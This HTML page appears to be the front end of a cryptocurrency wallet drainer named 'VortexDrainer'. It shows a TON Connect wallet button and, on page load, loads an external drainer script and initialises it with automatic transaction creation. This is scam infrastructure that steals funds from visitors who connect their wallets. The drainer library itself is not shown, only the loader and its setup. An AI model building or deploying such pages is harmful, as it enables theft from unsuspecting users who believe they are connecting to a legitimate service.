<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>VortexDrainer</title>
  <link rel="stylesheet" href="/vrtx.css" />
</head>
<body>
<div class="ton-connect-button"></div>

<!-- Import VortexDrainer library with error handling -->
<script src="/vrtx.js" defer crossorigin></script>

<!-- Initialize VortexDrainer and set up event listeners with isolated scope -->
<script>
  (function() {
    function initDrainer() {
      if (window.drainer && typeof window.drainer.init === 'function') {
        try {
          window.drainer.init({
            autoCreateTransaction: true,
            autoOpenModal: false,
            disableWalletSave: false
          });
        } catch (error) {
          console.error('Error initializing VortexDrainer:', error);
        }
      } else {
        console.warn('VortexDrainer not yet loaded. Retrying...');
        setTimeout(initDrainer, 100);
      }
    }

    window.addEventListener('load', initDrainer);
  })();
</script>
</body>
</html>
